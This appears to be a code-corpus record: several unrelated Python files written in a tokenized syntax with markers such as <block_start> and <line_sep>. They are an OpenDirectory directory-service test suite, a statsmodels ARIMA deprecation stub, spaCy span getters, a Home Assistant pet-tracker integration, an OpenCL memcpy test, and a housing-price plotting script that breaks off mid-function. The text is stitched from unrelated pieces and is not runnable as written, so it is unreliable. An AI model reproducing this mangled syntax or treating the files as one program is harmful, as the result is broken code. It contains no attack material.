odtestsubgroupa".split()<line_sep>NETWORK_SHORTNAMES="odtestamanda odtestbetty odtestcarlene odtestdenise odtestsubgroupb odtestgrouptop".split()<def_stmt>onlyIfPopulated func<block_start>""" Only run the decorated test method if the "odtestamanda" record exists """<line_sep>@inlineCallbacks<def_stmt>checkThenRun self<block_start>record=<yield>self.service.recordWithShortName(self.service.recordType.user u"odtestamanda")<if_stmt>record<is><not><none><block_start>result=<yield>func(self)<line_sep>returnValue(result)<block_end><else_stmt><block_start>print("OD not populated, skipping {}".format(func.func_name))<block_end><block_end><return>checkThenRun<block_end><class_stmt>LiveOpenDirectoryServiceTestCase(unittest.TestCase)<block_start>""" Live service tests for L{DirectoryService}. """<def_stmt>setUp self<block_start>self.service=DirectoryService()<block_end><def_stmt>tearDown self<block_start>self.service._deletePool()<block_end><def_stmt>verifyResults self records expected unexpected<block_start>shortNames=[]<for_stmt>record records<block_start><for_stmt>shortName record.shortNames<block_start>shortNames.append(shortName)<block_end><block_end><for_stmt>name expected<block_start>self.assertTrue(name<in>shortNames)<block_end><for_stmt>name unexpected<block_start>self.assertFalse(name<in>shortNames)<block_end><block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_shortNameStartsWith self<block_start>records=<yield>self.service.recordsFromExpression(MatchExpression(self.service.fieldName.shortNames u"odtest" matchType=MatchType.startsWith))<line_sep>self.verifyResults(records chain(LOCAL_SHORTNAMES NETWORK_SHORTNAMES) ["anotherodtestamanda" "anotherodtestalbert"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_uid self<block_start><for_stmt>uid,name ((u"9DC04A71-E6DD-11DF-9492-0800200C9A66" u"odtestbetty") (u"9DC04A75-E6DD-11DF-9492-0800200C9A66" u"odtestbill") )<block_start>record=<yield>self.service.recordWithUID(uid)<line_sep>self.assertTrue(record<is><not><none>)<line_sep>self.assertEquals(record.shortNames[0] name)<block_end><block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_guid self<block_start><for_stmt>guid,name ((UUID("9DC04A71-E6DD-11DF-9492-0800200C9A66") u"odtestbetty") (UUID("9DC04A75-E6DD-11DF-9492-0800200C9A66") u"odtestbill") )<block_start>record=<yield>self.service.recordWithGUID(guid)<line_sep>self.assertTrue(record<is><not><none>)<line_sep>self.assertEquals(record.shortNames[0] name)<block_end><block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_compoundWithoutRecordType self<block_start>expression=CompoundExpression([CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"be" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"be" matchType=MatchType.startsWith) ] Operand.OR) CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"test" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"test" matchType=MatchType.startsWith) ] Operand.OR) ] Operand.AND)<line_sep>records=<yield>self.service.recordsFromExpression(expression)<line_sep># We should get back users and groups since we did not specify a type: self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert" "odtestgroupbetty" "odtestgroupalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_compoundWithExplicitRecordType self<block_start>expression=CompoundExpression([CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"be" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"be" matchType=MatchType.startsWith) ] Operand.OR) CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"test" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"test" matchType=MatchType.startsWith) ] Operand.OR) ] Operand.AND)<line_sep>records=<yield>self.service.recordsFromExpression(expression recordTypes=[self.service.recordType.user])<line_sep># We should get back users but not groups: self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_compoundWithMultipleExplicitRecordTypes self<block_start>expression=CompoundExpression([CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"be" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"be" matchType=MatchType.startsWith) ] Operand.OR) CompoundExpression([MatchExpression(self.service.fieldName.fullNames u"test" matchType=MatchType.contains) MatchExpression(self.service.fieldName.emailAddresses u"test" matchType=MatchType.startsWith) ] Operand.OR) ] Operand.AND)<line_sep>records=<yield>self.service.recordsFromExpression(expression recordTypes=[self.service.recordType.user self.service.recordType.group])<line_sep># We should get back users and groups: self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert" "odtestgroupbetty" "odtestgroupalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingTokens self<block_start>self.calService=CalOpenDirectoryService()<line_sep>records=<yield>self.calService.recordsMatchingTokens([u"be" u"test"])<line_sep>self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert" "odtestgroupbetty" "odtestgroupalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingTokensWithContextUser self<block_start>self.calService=CalOpenDirectoryService()<line_sep>records=<yield>self.calService.recordsMatchingTokens([u"be" u"test"] context=self.calService.searchContext_user)<line_sep>self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert" ] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb" "odtestgroupbetty" "odtestgroupalbert"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingTokensWithContextGroup self<block_start>self.calService=CalOpenDirectoryService()<line_sep>records=<yield>self.calService.recordsMatchingTokens([u"be" u"test"] context=self.calService.searchContext_group)<line_sep>self.verifyResults(records ["odtestgroupbetty" "odtestgroupalbert"] ["odtestamanda" "odtestbill" "odtestgroupa" "odtestgroupb" "odtestbetty" "odtestalbert" "anotherodtestalbert"])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingMultipleFieldsNoRecordType self<block_start>self.calService=CalOpenDirectoryService()<line_sep>fields=((u"fullNames" u"be" MatchFlags.caseInsensitive MatchType.contains) (u"fullNames" u"test" MatchFlags.caseInsensitive MatchType.contains) )<line_sep>records=(<yield>self.calService.recordsMatchingFields(fields operand=Operand.AND recordType=<none>))<line_sep>self.verifyResults(records ["odtestgroupbetty" "odtestgroupalbert" "odtestbetty" "odtestalbert" "anotherodtestalbert"] ["odtestamanda" ])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingSingleFieldNoRecordType self<block_start>self.calService=CalOpenDirectoryService()<line_sep>fields=((u"fullNames" u"test" MatchFlags.caseInsensitive MatchType.contains) )<line_sep>records=(<yield>self.calService.recordsMatchingFields(fields operand=Operand.AND recordType=<none>))<line_sep>self.verifyResults(records ["odtestgroupbetty" "odtestgroupalbert" "odtestbetty" "odtestalbert" "anotherodtestalbert" "odtestamanda" ] ["nobody" ])<block_end>@onlyIfPopulated@inlineCallbacks<def_stmt>test_recordsMatchingFieldsWithRecordType self<block_start>self.calService=CalOpenDirectoryService()<line_sep>fields=((u"fullNames" u"be" MatchFlags.caseInsensitive MatchType.contains) (u"fullNames" u"test" MatchFlags.caseInsensitive MatchType.contains) )<line_sep>records=(<yield>self.calService.recordsMatchingFields(fields operand=Operand.AND recordType=self.calService.recordType.user))<line_sep>self.verifyResults(records ["odtestbetty" "odtestalbert" "anotherodtestalbert"] ["odtestamanda" "odtestgroupalbert" "odtestgroupbetty" ])<block_end><block_end><block_end>
""" See statsmodels.tsa.arima.model.ARIMA and statsmodels.tsa.SARIMAX. """<line_sep>ARIMA_DEPRECATION_ERROR=""" statsmodels.tsa.arima_model.ARMA and statsmodels.tsa.arima_model.ARIMA have been removed in favor of statsmodels.tsa.arima.model.ARIMA (note the . between arima and model) and statsmodels.tsa.SARIMAX. statsmodels.tsa.arima.model.ARIMA makes use of the statespace framework and is both well tested and maintained. It also offers alternative specialized parameter estimators. """<class_stmt>ARMA<block_start>""" ARMA has been deprecated in favor of the new implementation See Also -------- statsmodels.tsa.arima.model.ARIMA ARIMA models with a variety of parameter estimators statsmodels.tsa.statespace.SARIMAX SARIMAX models estimated using MLE """<def_stmt>__init__ self *args **kwargs<block_start><raise>NotImplementedError(ARIMA_DEPRECATION_ERROR)<block_end><block_end><class_stmt>ARIMA(ARMA)<block_start>""" ARIMA has been deprecated in favor of the new implementation See Also -------- statsmodels.tsa.arima.model.ARIMA ARIMA models with a variety of parameter estimators statsmodels.tsa.statespace.SARIMAX SARIMAX models estimated using MLE """<def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><block_end><class_stmt>ARMAResults<block_start>""" ARMA has been deprecated in favor of the new implementation See Also -------- statsmodels.tsa.arima.model.ARIMA ARIMA models with a variety of parameter estimators statsmodels.tsa.statespace.SARIMAX SARIMAX models estimated using MLE """<def_stmt>__init__ self *args **kwargs<block_start><raise>NotImplementedError(ARIMA_DEPRECATION_ERROR)<block_end><block_end><class_stmt>ARIMAResults(ARMAResults)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><block_end>
<import_from_stmt>typing Callable Iterable List<import_from_stmt>functools partial<import_from_stmt>spacy.tokens Doc Span<import_from_stmt>.util registry<line_sep>SpannerT=Callable[[List[Doc]] List[List[Span]]]<def_stmt>get_strided_spans docs:Iterable[Doc] window:int stride:int<arrow>List[List[Span]]<block_start>spans=[]<for_stmt>doc docs<block_start>start=0<line_sep>spans.append([])<for_stmt>i range(len(doc)<floordiv>stride)<block_start>spans[-1].append(doc[start:start+window])<if_stmt>(start+window)<ge>len(doc)<block_start><break><block_end>start<augadd>stride<block_end><else_stmt><block_start><if_stmt>start<l>len(doc)<block_start>spans[-1].append(doc[start:])<block_end><block_end><block_end><return>spans<block_end>@registry.span_getters("spacy-transformers.strided_spans.v1")<def_stmt>configure_strided_spans window:int stride:int<arrow>SpannerT<block_start>""" Set the 'window' and 'stride' options for getting strided spans. If you set the window and stride to the same value, the spans will cover each token once. Setting 'stride' lower than 'window' will allow for an overlap, so that some tokens are counted twice. This can be desirable, because it allows all tokens to have both a left and right context. """<line_sep><return>partial(get_strided_spans window=window stride=stride)<block_end><def_stmt>get_sent_spans docs:Iterable[Doc]<arrow>List[List[Span]]<block_start><return>[list(doc.sents)<for>doc docs]<block_end>@registry.span_getters("spacy-transformers.sent_spans.v1")<def_stmt>configure_get_sent_spans <arrow>Callable<block_start>""" Create a `span_getter` that uses sentence boundary markers to extract the spans. This requires sentence boundaries to be set, and may result in somewhat uneven batches, depending on the sentence lengths. However, it does provide the transformer with more meaningful windows to attend over. """<line_sep><return>get_sent_spans<block_end><def_stmt>get_doc_spans docs:Iterable[Doc]<arrow>List[List[Span]]<block_start><return>[[doc[:]]<for>doc docs]<block_end>@registry.span_getters("spacy-transformers.doc_spans.v1")<def_stmt>configure_get_doc_spans <arrow>Callable<block_start>""" Create a `span_getter` that uses the whole document as its spans. This is the best approach if your `Doc` objects already refer to relatively short texts. """<line_sep><return>get_doc_spans<block_end>get_sent_spans=configure_get_sent_spans()<line_sep>get_doc_spans=configure_get_doc_spans()<line_sep>__all__=["get_sent_spans" "get_doc_spans" "configure_get_doc_spans" "configure_get_sent_spans" "configure_strided_spans" ]<line_sep>
"""Support for Tractive device trackers."""<import_from_future_stmt> annotations<import_from_stmt>typing Any<import_from_stmt>homeassistant.components.device_tracker SOURCE_TYPE_BLUETOOTH SOURCE_TYPE_GPS <import_from_stmt>homeassistant.components.device_tracker.config_entry TrackerEntity<import_from_stmt>homeassistant.config_entries ConfigEntry<import_from_stmt>homeassistant.core HomeAssistant callback<import_from_stmt>homeassistant.helpers.dispatcher async_dispatcher_connect<import_from_stmt>homeassistant.helpers.entity_platform AddEntitiesCallback<import_from_stmt>. Trackables<import_from_stmt>.const CLIENT DOMAIN SERVER_UNAVAILABLE TRACKABLES TRACKER_HARDWARE_STATUS_UPDATED TRACKER_POSITION_UPDATED <import_from_stmt>.entity TractiveEntity<async_keyword><def_stmt>async_setup_entry hass:HomeAssistant entry:ConfigEntry async_add_entities:AddEntitiesCallback<arrow><none><block_start>"""Set up Tractive device trackers."""<line_sep>client=hass.data[DOMAIN][entry.entry_id][CLIENT]<line_sep>trackables=hass.data[DOMAIN][entry.entry_id][TRACKABLES]<line_sep>entities=[TractiveDeviceTracker(client.user_id item)<for>item trackables]<line_sep>async_add_entities(entities)<block_end><class_stmt>TractiveDeviceTracker(TractiveEntity TrackerEntity)<block_start>"""Tractive device tracker."""<line_sep>_attr_icon="mdi:paw"<def_stmt>__init__ self user_id:str item:Trackables<arrow><none><block_start>"""Initialize tracker entity."""<line_sep>super().__init__(user_id item.trackable item.tracker_details)<line_sep>self._battery_level:int=item.hw_info["battery_level"]<line_sep>self._latitude:float=item.pos_report["latlong"][0]<line_sep>self._longitude:float=item.pos_report["latlong"][1]<line_sep>self._accuracy:int=item.pos_report["pos_uncertainty"]<line_sep>self._source_type:str=item.pos_report["sensor_used"]<line_sep>self._attr_name=f"{self._tracker_id} {item.trackable['details']['name']}"<line_sep>self._attr_unique_id=item.trackable["_id"]<block_end>@property<def_stmt>source_type self<arrow>str<block_start>"""Return the source type, eg gps or router, of the device."""<if_stmt>self._source_type<eq>"PHONE"<block_start><return>SOURCE_TYPE_BLUETOOTH<block_end><return>SOURCE_TYPE_GPS<block_end>@property<def_stmt>latitude self<arrow>float<block_start>"""Return latitude value of the device."""<line_sep><return>self._latitude<block_end>@property<def_stmt>longitude self<arrow>float<block_start>"""Return longitude value of the device."""<line_sep><return>self._longitude<block_end>@property<def_stmt>location_accuracy self<arrow>int<block_start>"""Return the gps accuracy of the device."""<line_sep><return>self._accuracy<block_end>@property<def_stmt>battery_level self<arrow>int<block_start>"""Return the battery level of the device."""<line_sep><return>self._battery_level<block_end>@callback<def_stmt>_handle_hardware_status_update self event:dict[str Any]<arrow><none><block_start>self._battery_level=event["battery_level"]<line_sep>self._attr_available=<true><line_sep>self.async_write_ha_state()<block_end>@callback<def_stmt>_handle_position_update self event:dict[str Any]<arrow><none><block_start>self._latitude=event["latitude"]<line_sep>self._longitude=event["longitude"]<line_sep>self._accuracy=event["accuracy"]<line_sep>self._source_type=event["sensor_used"]<line_sep>self._attr_available=<true><line_sep>self.async_write_ha_state()<block_end>@callback<def_stmt>_handle_server_unavailable self<arrow><none><block_start>self._attr_available=<false><line_sep>self.async_write_ha_state()<block_end><async_keyword><def_stmt>async_added_to_hass self<arrow><none><block_start>"""Handle entity which will be added."""<line_sep>self.async_on_remove(async_dispatcher_connect(self.hass f"{TRACKER_HARDWARE_STATUS_UPDATED}-{self._tracker_id}" self._handle_hardware_status_update ))<line_sep>self.async_on_remove(async_dispatcher_connect(self.hass f"{TRACKER_POSITION_UPDATED}-{self._tracker_id}" self._handle_position_update ))<line_sep>self.async_on_remove(async_dispatcher_connect(self.hass f"{SERVER_UNAVAILABLE}-{self._user_id}" self._handle_server_unavailable ))<block_end><block_end>
# Copyright (c) 2014-2017, NVIDIA CORPORATION. All rights reserved. <import_from_future_stmt> absolute_import<import_from_stmt>.images ImageClassificationDatasetJob GenericImageDatasetJob<import_from_stmt>.generic GenericDatasetJob<import_from_stmt>.job DatasetJob<line_sep>__all__=['ImageClassificationDatasetJob' 'GenericImageDatasetJob' 'GenericDatasetJob' 'DatasetJob' ]<line_sep>
# Copyright <NAME> 2017 """ Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """<import_stmt>numpy<as>np<import_stmt>pyopencl<as>cl<import_stmt>os<import_stmt>math<import_stmt>pytest<import_from_stmt>test test_common<import_from_stmt>test.test_common offset_type<def_stmt>test_memcpy context q int_data int_data_gpu<block_start>ll_code=""" declare void @_Z6memcpyPvPKvm(i8*, i8*, i64) define void @mykernel(i32* %data) { %1 = bitcast i32* %data to i8* %2 = getelementptr i32, i32* %data, i32 8 %3 = bitcast i32* %2 to i8* call void @_Z6memcpyPvPKvm(i8 *%3, i8 *%1, i64 32) ret void } """<line_sep>cl_code=test_common.ll_to_cl(ll_code 'mykernel' num_clmems=1)<line_sep>print('cl_code' cl_code)<for_stmt>i range(8)<block_start>int_data[i]=3+i<block_end>cl.enqueue_copy(q int_data_gpu int_data)<line_sep>kernel=test_common.build_kernel(context cl_code 'mykernel')<line_sep>kernel(q (32 ) (32 ) int_data_gpu offset_type(0) offset_type(0) cl.LocalMemory(32))<line_sep>from_gpu=np.copy(int_data)<line_sep>cl.enqueue_copy(q from_gpu int_data_gpu)<line_sep>q.finish()<for_stmt>i range(8)<block_start>print(i from_gpu[8+i])<assert_stmt>from_gpu[8+i]<eq>3+i<block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>pandas<as>pd<line_sep>imgfilename='table.png'<import_stmt>numpy<as>np<import_stmt>os<import_stmt>datetime<import_stmt>six<import_stmt>matplotlib.pyplot<as>plt<import_stmt>matplotlib<import_from_stmt>matplotlib gridspec<import_from_stmt>pypinyin pinyin<import_stmt>numpy<as>np<import_from_stmt>matplotlib.font_manager FontProperties<line_sep>font=FontProperties(fname='font/Songti.ttc' size=18)<line_sep>matplotlib.font_manager.fontManager.addfont('font/Songti.ttc')<import_from_stmt>matplotlib.offsetbox TextArea DrawingArea OffsetImage AnnotationBbox<import_stmt>matplotlib.image<as>mpimg<def_stmt>read city<block_start>dfs=[]<for_stmt>root,dirs,files os.walk('data/chengjiao-%s/'%city)#print(root, files, dirs) <block_start>files.sort()<for_stmt>f files<block_start>fullPath=os.path.join(root f)<line_sep>#print(fullPath) df=<none><if_stmt>f.endswith('.xls')<block_start>df=pd.read_excel(fullPath converters={'成交价(元/平)':<lambda>x:float(x) '链家编号':str '产权年限':str})<block_end><elif_stmt>f.endswith('.csv')<block_start>df=pd.read_csv(fullPath converters={'成交价(元/平)':<lambda>x:float(x) '链家编号':str})<block_end><else_stmt><block_start><continue><block_end><if_stmt>len(df)<eq>0<block_start>print('No data in %s'%fullPath)<line_sep><continue><block_end><if_stmt>'单价(元/平米)'<in>df.columns<block_start>df['单价(元/平米)']=pd.to_numeric(df['单价(元/平米)'] errors="coerce")<block_end>df=df.rename(columns={'单价(元/平米)':'成交价(元/平)' '所属小区':'小区' '建筑面积:平米':'建筑面积' '浏览(次)':'浏览(次)' '关注(人)':'关注(人)' '带看(次)':'带看(次)' '所属下辖区':'下辖区' '房权所属':'产权所属' '房屋朝向':'朝向' '调价(次)':'调价(次)' '建成时间:年':'建成时间' '所属商圈':'商圈' '装修情况':'装修' '成交周期(天)':'成交周期(天)' '房屋户型':'户型' '产权年限':'土地年限' '楼层状态':'所在楼层' '挂牌价格(万)':'挂牌价格(万)' '配备电梯':'电梯'})<line_sep>#去掉面积单位 <try_stmt><block_start>mj=df['建筑面积']<line_sep>mj_num=[]<for_stmt>m mj<block_start>m=str(m)<if_stmt>'㎡'<in>m<block_start>m=m[:m.find('㎡')]<block_end><try_stmt><block_start>m=float(m)<block_end><except_stmt><block_start>m=np.nan<block_end>mj_num.append(m)<block_end>df['建筑面积']=mj_num<block_end><except_stmt><block_start><pass><block_end>#统一成交时间格式 <try_stmt><block_start>time=[]<for_stmt>t df['成交时间']<block_start>t=str(t)<if_stmt>'/'<in>t<block_start>t='-'.join(t.split('/'))<block_end><if_stmt>'成交'<in>t<block_start>t=t.replace('成交' '').strip()<block_end>time.append(t)<block_end>df['成交时间']=time<block_end><except_stmt>Exception<as>e<block_start>df.columns<line_sep>print(fullPath)<line_sep>print('成交时间错误' e)<line_sep><pass><block_end>#去掉售价单位 <try_stmt><block_start>sj=df['售价(万)']<line_sep>sj_num=[]<for_stmt>s sj<block_start>s=str(s)<if_stmt>'万'<in>s<block_start>s=s[:s.find('万')]<block_end><if_stmt>'-'<in>s#print(s) <block_start>s=s.split('-')[-1]<block_end>s=float(s)<line_sep>sj_num.append(s)<block_end>df['售价(万)']=sj_num<block_end><except_stmt><block_start><pass><block_end><try_stmt><block_start>df['成交价(元/平)']=pd.to_numeric(df['成交价(元/平)'] errors='coerse')<block_end><except_stmt><block_start><pass><block_end><if_stmt>len(df)<g>0<block_start>dfs.append(df)<block_end><block_end><block_end>df=pd.concat(dfs)<line_sep>print('raw count:' len(df))<line_sep>df=df.drop_duplicates(subset=['链家编号'])<line_sep>print('count after drop duplicates' len(df))<if_stmt>city<in>['北京' '上海' '深圳']<block_start>df=df.loc[df['成交价(元/平)']<g>10000]<block_end><elif_stmt>city<in>['广州' '杭州']<block_start>df=df.loc[df['成交价(元/平)']<g>5000]<block_end><else_stmt><block_start>df=df.loc[df['成交价(元/平)']<g>1000]<block_end>df=df.loc[df['成交价(元/平)']<l>200000]<line_sep>print('count after drop less than 1000' len(df))<if_stmt>city<not><in>['重庆' 'allcq' '南京']<block_start>df=df.loc[~df['土地年限'].str.contains('40' na=<false>)]<line_sep>df=df.loc[~df['土地年限'].str.contains('50' na=<false>)]<block_end>print('count after drop 40, 50' len(df))<line_sep>df=df.set_index('链家编号')<line_sep>#print(len(df)) <return>df<block_end>MA=<true><line_sep>#MA = False ma_length=30<line_sep>start_date='2017-01-01'<line_sep>city='default'<def_stmt>get_moving_average res ma_length keep_all=<false><block_start>startDate=datetime.datetime.strptime(res.index[0] '%Y-%m-%d')<line_sep>endDate=datetime.datetime.strptime(res.index[-1] '%Y-%m-%d')<line_sep>#print(startDate, endDate) date_range=[str(x.date())<for>x pd.date_range(startDate endDate)]<line_sep>volume_ma=[]<line_sep>median_ma=[]<line_sep>mean_ma=[]<for_stmt>i range(len(date_range)-ma_length)<block_start>interval_data=res.loc[(res.index<ge>date_range[i])&(res.index<le>date_range[i+ma_length])]<line_sep>volume_ele=sum(interval_data['volume'])<line_sep>median_ele=0<line_sep>mean_ele=0<for_stmt>index,row interval_data.iterrows()<block_start>median_ele<augadd>row['volume']<times>row['median_price']<line_sep>mean_ele<augadd>row['volume']<times>row['mean_price']<block_end>volume_ma.append(volume_ele)<if_stmt>volume_ele<eq>0<block_start>median_ma.append(median_ma[-1])<line_sep>mean_ma.append(mean_ma[-1])<block_end><else_stmt><block_start>median_ma.append(median_ele/volume_ele)<line_sep>mean_ma.append(mean_ele/volume_ele)<block_end><block_end>last_index=0<if_stmt>keep_all<eq><false><block_start><for_stmt>i range(len(volume_ma))<block_start><if_stmt>volume_ma[i]<l>ma_length/6<block_start>last_index=i<block_end><block_end><block_end>volume_ma=volume_ma[last_index+1:]<line_sep>median_ma=median_ma[last_index+1:]<line_sep>mean_ma=mean_ma[last_index+1:]<line_sep><return>pd.DataFrame({'volume':volume_ma 'median_price':median_ma 'mean_price':mean_ma} index=date_range[ma_length+last_index+1:])<block_end><def_stmt>resetXticks ax res<block_start>labels=res.index<line_sep>xticks=ax.get_xticks()<if_stmt>len(xticks)<l>366<block_start>tick_month=['%0.2d'%i<for>i range(1 13)]<block_end><else_stmt><block_start>tick_month=['%0.2d'%i<for>i range(1 13 3)]<block_end>target_xticks=[]<line_sep>last_index=0<line_sep>month_mark=set()<for_stmt>i range(len(labels))<block_start>label=labels[i]<line_sep>tick=xticks[i]<line_sep>(year month day)=label.split('-')<if_stmt>month<in>tick_month<and>'-'.join([year month])<not><in>month_mark<block_start>month_mark.add('-'.join([year month]))<line_sep>last_index=i<line_sep>target_xticks.append(tick)<block_end><block_end><if_stmt>len(res)-last_index<l>20<block_start>target_xticks=target_xticks[:-1]+[xticks[-1]]<block_end><else_stmt><block_start>target_xticks=target_xticks+[xticks[-1]]<block_end>ax.set_xticks(target_xticks)<block_end><def_stmt>plot res city title MA ma_length start_date=<none> force=<false> keep_all=<false><block_start><if_stmt>force<eq><false><and>len(res)<l>10+ma_length<block_start><return>pd.DataFrame()<block_end><if_stmt>MA<eq><true><block_start>res=get_moving_average(res ma_length keep_all)<block_end><if_stmt>force<eq><false><and>len(res)<l>10<block_start><return>pd.DataFrame()<block_end><if_stmt>start_date<is><not><none><block_start>res=res.loc[res.index<ge>start_date :]<if_stmt>len(res)<g>0<and>res.index[0]<g>start_date<block_start>date_range=[str(x.date())<for>x pd.date_range(start_date res.index[0])]<line_sep>date_range=[str(x.date())<for>x pd.date_range(start_date res.index[0])]<line_sep>padding=pd.DataFrame(columns=res.columns index=date_range[:-1])<line_sep>padding.volume=[0]<times>len(padding)<line_sep>res=pd.concat([padding res])<block_end><block_end>plt.rcParams['font.sans-serif']=['SimHei']<line_sep>matplotlib.rc('font' size=18)<line_sep>matplotlib.rcParams['figure.figsize']=[15 15]<line_sep>gs=gridspec.GridSpec(2 1 height_ratios=[3 1])<line_sep>ax0=plt.subplot(gs[0])<line_sep>ax0.plot(res['median_price'])<line_sep>ax0.plot(res['mean_price'])<line_sep>ax0.legend(['%d日中位数=%.0f'%(ma_length res['median_price'][-1]) '%d日均价=%.0f'%(ma_length res['mean_price'][-1])] prop=font)<line_sep>x1,x2,y1,y2=ax0.axis()<line_sep>ax0.axis((x1 x2 0 y2))<line_sep>#插入二维码 qrcode=mpimg.imread('wechatqrcode.png')<line_sep>imagebox=OffsetImage(qrcode zoom=0.5)<line_sep>ab=AnnotationBbox(imagebox (0.2<times>x2 0.2<times>y2))<line_sep>ax0.add_artist(ab)<line_sep>resetXticks(ax0 res)<line_sep>plt.setp(ax0.get_xticklabels() visible=<false>)<line_sep>plt.grid(<true>)<line_sep>plt.title(title+'--欢迎扫二维码关注公众号获取其他城市房价走势还有低佣金证券开户' fontproperties=font)<line_sep>#重画x轴 ax1=plt.subplot(gs[1])<line_sep>#ax1.bar(res.index, res['volume']) ax1.fill_between(res.index res['volume'])<line_sep>ax1.legend(['30日成交量'] prop=font)<line_sep>resetXticks(ax1 res)<line_sep>plt.xticks(rotation=90)<line_sep>dir_name=os.path.join('fig' city)<if_stmt><not>os.path.exists(dir_name)<block_start>os.makedirs(dir_name)<block_end>plt.tight_layout()<line_sep>plt.savefig(os.path.join(dir_name title+'.png'))<line_sep>#plt.show() plt.close()<line_sep>res.to_excel('data/trend/%s-%s.xlsx'%(city title))<line_sep><return>res<block_end><def_stmt>plot_district df city district='朝阳' ma_length=-1 start_date=<none><block_start><if_stmt>district<eq>'静安'<block_start>gp=df.loc[df['下辖区'].isin(set(['静安' '闸北']))].groupby(['成交时间'])<block_end><else_stmt><block_start>gp=df.loc[df['下辖区']<eq>district].groupby(['成交时间'])<block_end>res=pd.DataFrame({'volume':gp.size() 'mean_price':gp['成交价(元/平)'].mean() 'median_price':gp['成交价(元/平)'].median()})<line_sep>res=res.iloc[:len(res) :]<line_sep>title=district<line_sep><return>plot(res city title MA ma_length start_date <false> <true>)<block_end><def_stmt>plot_df df city title MA ma_length start_date=<none> force=<false><block_start>gp=df.groupby(['成交时间'])['成交价(元/平)']<line_sep>res=pd.DataFrame({"volume":gp.size() "median_price":gp.median() "mean_price":gp.mean()})<line_sep>res=res.iloc[:len(res) :]<line_sep>plot(res city title MA ma_length start_date force)<block_end><def_stmt>plot_dfs dfs title legends ma_length=30 start_date=<none><block_start>ress=[]<for_stmt>df dfs<block_start>gp=df.groupby(['成交时间'])['成交价(元/平)']<line_sep>res=pd.DataFrame({"volume":gp.size() "median_price":gp.median() "mean_price":gp.mean()})<line_sep>res=res.iloc[:len(res) :]<if_stmt>len(res)<l>10+ma_length<block_start><return><block_end><if_stmt>ma_length<ne>-1<block_start>res=get_moving_average(res ma_length)<block_end><if_stmt>start_date<is><not><none><block_start>res=res.loc[res.index<ge>start_date :]<block_end>ress.append(res)<block_end>plt.rcParams['font.sans-serif']=['SimHei']<line_sep>matplotlib.rc('font' size=18)<line_sep>matplotlib.rcParams['figure.figsize']=[15 10]<line_sep>index=ress[0].index<for_stmt>res ress<block_start>res=res.loc[res.index.isin(index)]<line_sep>plt.plot(res['mean_price']/res['mean_price'].iloc[0])<block_end>plt.legend(legends prop=font)<line_sep>plt.title(title fontproperties=font)<line_sep>ax0=plt.gca()<line_sep>xticks=ax0.xaxis.get_major_ticks()<line_sep>interval=len(xticks)<floordiv>10<line_sep>ax0.set_xticks(ax0.get_xticks()[::interval])<line_sep>plt.xticks(rotation=30)<line_sep>plt.grid(<true>)<line_sep>dir_name=os.path.join('fig' city)<if_stmt><not>os.path.exists(dir_name)<block_start>os.makedirs(dir_name)<block_end>plt.savefig(os.path.join(dir_name title+'.png'))<line_sep>plt.show()<line_sep>plt.close()<block_end><def_stmt>render_mpl_table data filename col_width=3.0 row_height=1 font_size=24 header_color='#40466e' row_colors=['#f1f1f2' 'w'] edge_color='w' bbox=[0 0 1 1] header_columns=0 ax=<none> **kwargs<block_start>matplotlib.rcParams['font.sans-serif']="Songti SC"<line_sep>matplotlib.rcParams['font.family']="sans-serif"<if_stmt>ax<is><none><block_start>size=(np.array(data.shape[::-1])+np.array([0 6]))<times>np.array([col_width row_height])<line_sep>matplotlib.rcParams['figure.figsize']=size<line_sep>gs=gridspec.GridSpec(2 1 height_ratios=[4 1])<line_sep>ax=plt.subplot(gs[0])<line_sep>ax2=plt.subplot(gs[1])<line_sep>ax.axis('off')<block_end>mpl_table=ax.table(cellText=data.values bbox=bbox colLabels=data.columns **kwargs)<line_sep>mpl_table.auto_set_font_size(<false>)<line_sep>mpl_table.set_fontsize(font_size)<for_stmt>k,cell 